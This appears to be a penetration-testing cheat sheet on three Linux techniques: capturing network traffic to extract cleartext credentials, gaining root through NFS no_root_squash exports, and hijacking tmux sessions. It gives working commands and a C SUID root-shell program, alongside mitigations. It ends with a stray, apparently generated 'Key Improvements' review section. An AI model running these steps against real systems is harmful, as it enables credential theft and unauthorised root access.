17.Miscellaneous-techniques

Passive Traffic Capture:

Capture Traffic

sudo tcpdump -i <interface> -w capture.pcap

Analyze Capture with net-creds (if installed)

net-creds capture.pcap

Analyze Capture with PCredz (if installed)

PCredz capture.pcap

Analyze Capture with tshark (part of Wireshark)

tshark -r capture.pcap -T fields -e http.authorization -e ftp.password -e pop.password -e imap.password -e telnet.password -e smtp.password

Analyze Capture with Wireshark (GUI)

wireshark capture.pcap

Weak NFS Privileges:

Show NFS Exports

showmount -e <nfs_server_ip>

View NFS Exports Configuration

cat /etc/exports

Mount NFS Share (requires sudo)

sudo mount -t nfs <nfs_server_ip>:/<export_path> /mnt

Create SUID Binary (C Code Example)

cat > shell.c << EOF
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>

int main(void)
{
  setuid(0); setgid(0); system("/bin/bash");
}
EOF

gcc shell.c -o shell

Copy SUID Binary to NFS Mount

cp shell /mnt

Set SUID Bit

sudo chmod u+s /mnt/shell

Execute SUID Binary (on Target System)

./shell

Unmount NFS Share (requires sudo)

sudo umount /mnt

Hijacking Tmux Sessions:

Find Running tmux Processes

ps aux | grep tmux

Check tmux Socket Permissions

ls -la <tmux_socket>

Attach to tmux Session

tmux -S <tmux_socket> attach

Create a New Shared tmux Session (example)

tmux -S /shareds new -s debugsess

Change the Ownership of the tmux Socket (example)

sudo chown root:devs /shareds

1. Passive Traffic Capture:

• Concept:

  • Using tcpdump or similar tools to capture network traffic.

  • Analyzing the captured traffic for sensitive information (credentials, hashes).

• Vulnerabilities:

  • Cleartext protocols (HTTP, FTP, etc.).

  • Weak encryption.

  • Capture of hashes (Net-NTLMv2, Kerberos).

• Tools:

  • tcpdump

  • net-creds

  • PCredz

• Mitigation:

  • Use encrypted protocols (HTTPS, SSH).

  • Implement network segmentation.

  • Restrict access to tcpdump and similar tools.

  • Use tools that prevent cleartext credential transmission.

2. Weak NFS Privileges:

• Concept:

  • Exploiting misconfigurations in NFS exports.

  • Specifically, the no_root_squash option.

• Vulnerabilities:

  • no_root_squash allows remote root users to write files as root on the NFS server.

• Exploitation:

  • Mount the NFS share.

  • Create a SUID root binary.

  • Execute the binary to gain root privileges.

• Mitigation:

  • Use root_squash (default).

  • Restrict NFS exports.

  • Properly secure the NFS server.

• Commands:

  • showmount -e <nfs_server_ip>

  • cat /etc/exports

  • mount -t nfs <nfs_server_ip>:/<export_path> /mnt

  • chmod u+s <binary>

3. Hijacking Tmux Sessions:

• Concept:

  • Exploiting weak permissions on tmux sessions.

  • Attaching to a root-owned tmux session.

• Vulnerabilities:

  • World-writable or group-writable tmux sockets.

  • Root-owned tmux sessions.

• Exploitation:

  • Identify running tmux processes.

  • Check permissions on the tmux socket.

  • Attach to the session.

• Mitigation:

  • Set appropriate permissions on tmux sockets.

  • Avoid running privileged tmux sessions.

  • Use strong permissions on the tmux socket.

• Commands:

  • ps aux | grep tmux

  • ls -la <tmux_socket>

  • tmux -S <tmux_socket> attach

Key Improvements and Considerations:

• Clarity: The explanations are clear and concise.

• Security Best Practices: The mitigations are practical and relevant.

• Command Examples: The command examples are helpful.

• Real-World Relevance: These techniques are commonly used in penetration testing.

• NFS Security: More emphasis on the importance of NFS security best practices.

• Tmux Security: More emphasis on the importance of Tmux socket permissions.

• Traffic Capture: More emphasis on the importance of encrypted protocols.

• Detection: More emphasis on the importance of detecting these attacks.

• More tools: more tools for traffic capture could be mentioned, such as wireshark, and tshark.

• NFS Version: Mention the security differences between NFS version 3 and 4.